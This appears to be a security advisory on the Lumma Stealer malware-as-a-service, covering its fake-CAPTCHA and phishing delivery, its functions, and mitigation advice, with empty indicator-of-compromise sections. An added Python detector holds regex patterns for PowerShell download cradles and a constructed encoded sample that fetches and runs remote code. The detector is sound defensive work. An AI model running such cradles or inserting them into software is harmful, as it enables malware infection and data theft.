Threat Surge as Lumma Stealer Expands Its Reach

Threat Group: Lumma (operated by "Shamel")
Threat Type: Information Stealer (Malware-as-a-Service)
Exploited Vulnerabilities: No specific vulnerabilities; relies on social engineering and deceptive tactics
Malware Used: Lumma Stealer (also known as LummaC2)
Threat Score: High (8.5/10) – Due to its advanced evasion techniques, broad targeting capabilities, and widespread distribution methods.
Last Threat Observation: January 1, 2025

Overview

Lumma Stealer is a widely accessible information-stealing malware sold openly across Dark Web forums and Telegram channels. While it may not yet rival the popularity of other stealers like RedLine and Formbook, it has rapidly gained traction among cybercriminals targeting sensitive data. Operated by a group suspected to originate from former USSR countries, Lumma Stealer has been in active development since its emergence in 2022, receiving substantial updates to enhance its capabilities.

Recent activity indicates an increase in campaigns deploying Lumma Stealer, leveraging deceptive methods like fake CAPTCHA pages to trick victims into running malicious scripts. Because it runs on Windows 7 through Windows 11, the malware can reach a vast user base. Under a Malware-as-a-Service (MaaS) model, Lumma Stealer is accessible to anyone willing to pay for a subscription. Subscribers are offered three different plans with features like access to a command-and-control (C2) panel, enabling operators to monitor and manage compromised systems.

Key Details

  • Delivery Method: Fake CAPTCHA pages, phishing emails, malicious downloads, and Discord messages.
  • Target: Users across various sectors, particularly cryptocurrency holders and those storing sensitive browser information.
  • Functions:
    • Data exfiltration from browsers and cryptocurrency wallets.
    • Regular updates from Command-and-Control (C2) servers.
    • Loader capabilities for deploying additional malware.
    • Advanced evasion techniques, including process hollowing and anti-sandbox measures.
    • Use of encryption to obfuscate malicious activities.
  • Obfuscation: Employs multi-layered encryption and process injection techniques to evade detection.

Attack Vectors

Lumma Stealer employs several deceptive methods to infiltrate systems:

  1. Fake CAPTCHA Pages: Users are tricked into interacting with seemingly legitimate CAPTCHA challenges, triggering malicious PowerShell scripts upon completion.
  2. Phishing Emails: Targets receive emails urging immediate action on fabricated security issues, leading them to malicious websites.
  3. Fake Software: Disguised as legitimate or cracked software, these downloads infect users' systems upon installation.
  4. Discord Messages: Operators engage with users on Discord, persuading them to download infected executables under false pretenses.

Known Indicators of Compromise (IoCs)

Domains

The following domains were flagged as potentially malicious:


URLs

The following URLs were identified as suspicious:


IP Addresses

These IP addresses were involved in potentially malicious activity:


MD5 File Hashes

The following MD5 file hashes represent potentially malicious files:


Mitigation and Prevention

  • User Awareness: Educate users on the risks of interacting with unsolicited emails, downloading cracked software, and executing scripts from untrusted sources.
  • Email Filtering: Implement robust email filtering to block phishing attempts and malicious attachments.
  • Antivirus Protection: Ensure updated antivirus software is in place to detect and block malware like Lumma Stealer.
  • Two-Factor Authentication (2FA): Enforce 2FA to secure access to sensitive systems and accounts.
  • Monitor Logs: Regularly analyze system logs for anomalies indicating potential compromise.
  • Regular Updates: Keep operating systems and applications patched to mitigate vulnerabilities.
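As an added example (not the advisory's own code), the following Python scores Windows process-creation records for the fake-CAPTCHA pattern described under Attack Vectors and supports the log-monitoring item above; the record layout, the sample records and the list of user-facing parent processes are constructed assumptions.

```python
import base64
import re
# Added example, not from the advisory: score Windows process-creation records
# for the "fake CAPTCHA -> PowerShell" pattern. Record layout (parent image,
# image, command line) is a constructed simplification of real telemetry.
FLAG_PATTERNS = {
    "encoded_command": re.compile(r"\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(?:iex|invoke-expression|irm|iwr|invoke-restmethod|"
                                  r"invoke-webrequest|downloadstring)\b", re.I),
}
# Assumption: a user shell or browser parent matches a user running a pasted
# "verification" command; tune the list to your environment.
USER_SHELL_PARENTS = ("explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:  # malformed base64 (binascii.Error subclasses ValueError)
        return ""

def score_record(parent, image, cmdline):
    """Return (score, reasons) for one record; non-PowerShell images score 0."""
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    # Scan the visible command line and the decoded payload together so that
    # a cradle hidden behind -EncodedCommand is still seen.
    text = cmdline + " " + decode_encoded_command(cmdline)
    reasons = [name for name, pat in FLAG_PATTERNS.items() if pat.search(text)]
    if parent.lower().endswith(USER_SHELL_PARENTS):
        reasons.append("launched_from_user_shell")
    return len(reasons), reasons

def triage(records, threshold=3):
    """Indexes of records whose score reaches the alert threshold."""
    return [i for i, r in enumerate(records) if score_record(*r)[0] >= threshold]

# Constructed sample telemetry: one fake-CAPTCHA style launch and two benign records.
ENCODED = base64.b64encode("iex (irm https://example.invalid/api)".encode("utf-16le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_RECORDS = [
    ("C:\\Windows\\explorer.exe", PS, f"powershell.exe -w hidden -ep bypass -enc {ENCODED}"),
    ("C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs"),
    ("C:\\Windows\\explorer.exe", PS, "powershell.exe Get-ChildItem C:\\Users"),
]
```

Feed `triage` with records parsed from Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled) and review anything at or above the threshold.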

Risk Assessment

Lumma Stealer poses a significant threat due to its evolving capabilities, widespread distribution, and sophisticated evasion tactics. Organizations and individuals are advised to adopt a multi-layered defense strategy to mitigate its impact effectively.

Conclusion

Lumma Stealer's growing adoption and evolution underscore the need for vigilance and proactive security measures. By understanding its delivery methods, capabilities, and indicators of compromise, organizations can bolster their defenses and mitigate potential damage.
